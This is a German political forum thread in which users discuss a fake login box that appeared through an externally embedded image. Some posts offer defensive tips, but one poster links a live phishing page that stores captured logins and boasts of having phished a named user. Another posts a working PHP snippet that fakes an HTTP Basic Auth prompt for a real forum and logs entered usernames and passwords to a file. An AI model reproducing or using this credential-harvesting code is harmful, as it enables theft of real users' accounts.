Unser Thema phishing - in Bezug auf die Politikarena.

  • Wer will mich da verarschen, habe gerade so eine Anmeldebox erhalten.
    Ich war aber gar nicht auf der PA Seite.
    :mehr als suspekt:


    Nachtrag:
    Wenn man hier auf Seite 2 geht.
    Mach was Alf!

    Ich wünschte, ich hätte mit allem früher angefangen, dann würde es länger dauern.


  • Das war nur eine Demo was passiert, wenn man einen bestimmten Verweis als Bild einfügt.
    Habe es wieder gelöscht.

    Vaterlandsliebe fand ich stets zum Kotzen. Ich wusste mit Deutschland noch nie etwas anzufangen und weiß es bis heute nicht.“ - Robert Habeck (Stellvertreter des Bundeskanzlers).


  • Wie soll das gehen?



    Na ja, er war Admin im DF und hatte seine Vertrauensstellung missbraucht.


    Inwiefern?



    Das geht wohl nur, wenn das Einbinden von Ressourcen unmöglich gemacht wird, die sonstwo im Web liegen.


    Selbst kann man nicht viel machen. Folgender Tipp für User. In der PA schalte ich den Editor auf Quelltext Mode. Somit sehe ich beim Antworten oder Zitieren zumindestens, wenn jemand externe Bilder einbaut. Und man erkennt, woher diese Bilder kommen. Wenn mir die URL "spanisch" vorkommt, lösche ich das Bild beim Zitieren. Toller Nebeneffekt. Man lernt einiges über die Nutzer. Der Doc z.B. baut gerne Smilies aus einem anderen Forum ein. Und zwar aus einem Seglerforum. Da scheint sich also jemand für's Segeln zu interessieren. Narrthan hat übrigens dasselbe Hobby, wie er mal schrieb! Welch ein Zufall :)


    Was den serverseitigen Schutz betrifft, sehe ich nur 2 Möglichkeiten.


    Entweder eine Blacklist mit erlaubten Image-Quellen(Bildhoster, Soziale Netzwerke und Medienseiten)
    Oder aber man erweitert das Forum insofern, dass jedes Bild vor der Ausgabe auf den Statuscode gecheckt wird.(404, 401 usw). Das liesse sich sicherlich mit ein paar Zeilen Code realisieren. Allerdings bräuchte man da einen eigenen Server, wegen der zusätzlichen Last.

    ______________________________________________________________________________________________________________________________________________________________
    „Krieg ist ein Zustand, bei dem Menschen aufeinander schießen, die sich nicht kennen, auf Befehl von Menschen, die sich wohl kennen, aber nicht aufeinander schießen.“
    George Bernard Shaw

  • Inwiefern?


    Indem er seine admin Anmeldeinformationen an unbefugte weiter gab, die darauf hin vertrauliche Informationen des Forums dazu nutzten,
    den Betreiber zu erpressen und zu diskreditieren.

    Vaterlandsliebe fand ich stets zum Kotzen. Ich wusste mit Deutschland noch nie etwas anzufangen und weiß es bis heute nicht.“ - Robert Habeck (Stellvertreter des Bundeskanzlers).

  • Indem er seine admin Anmeldeinformationen an unbefugte weiter gab, die darauf hin vertrauliche Informationen des Forums dazu nutzten,
    den Betreiber zu erpressen und zu diskreditieren.


    Ein sehr feiner Zug. Ich frage mich, wie man nach solch einer Nummer dem Herren noch mal zum Mod befördern kann.

    ______________________________________________________________________________________________________________________________________________________________
    „Krieg ist ein Zustand, bei dem Menschen aufeinander schießen, die sich nicht kennen, auf Befehl von Menschen, die sich wohl kennen, aber nicht aufeinander schießen.“
    George Bernard Shaw

  • Hier: http://politikarena.uphero.com/login.php



    ... speichert die Login-Daten in einer MySQL-Tabelle.
    Die ersten mit dem $ beginnenden Zeilen werden durch die Login-Daten der lokalen DB ersetzt.
    Den User "Tschak" aus politikpla.net habe ich schonmal gephisht: http://crazydog.prophpbb.com/post2698.html#p2698 :D

  • Verbesserungsvorschlag: Es geht auch mit 5 Zeilen ohne eigene Datenbank

    Zitat

    header('WWW-Authenticate: Basic realm="politikpla.net"');
    header('HTTP/1.0 401 Unauthorized');
    $handle = fopen("user.log", "a");
    fwrite($handle,$_SERVER['PHP_AUTH_USER'] . ': ' . $_SERVER['PHP_AUTH_PW'].'\n' );
    fclose($handle);


    @Admin. Ist der Strang öffentlich?


    Hier: http://politikarena.uphero.com/login.php



    ... speichert die Login-Daten in einer MySQL-Tabelle.
    Die ersten mit dem $ beginnenden Zeilen werden durch die Login-Daten der lokalen DB ersetzt.
    Den User "Tschak" aus politikpla.net habe ich schonmal gephisht: http://crazydog.prophpbb.com/post2698.html#p2698 :D

    ______________________________________________________________________________________________________________________________________________________________
    „Krieg ist ein Zustand, bei dem Menschen aufeinander schießen, die sich nicht kennen, auf Befehl von Menschen, die sich wohl kennen, aber nicht aufeinander schießen.“
    George Bernard Shaw


  • Sehr schön! :)
    Meine Variante ist Copy&Paste, aus Code-Samples aus dem PHP-Manual zusammengestückelt.


    Hast Du nix zu tun?

    ______________________________________________________________________________________________________________________________________________________________
    „Krieg ist ein Zustand, bei dem Menschen aufeinander schießen, die sich nicht kennen, auf Befehl von Menschen, die sich wohl kennen, aber nicht aufeinander schießen.“
    George Bernard Shaw

  • Der Freak ist zurück. Und dabei war es schon fast angenehm in der Arena die letzten Wochen

    ______________________________________________________________________________________________________________________________________________________________
    „Krieg ist ein Zustand, bei dem Menschen aufeinander schießen, die sich nicht kennen, auf Befehl von Menschen, die sich wohl kennen, aber nicht aufeinander schießen.“
    George Bernard Shaw

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!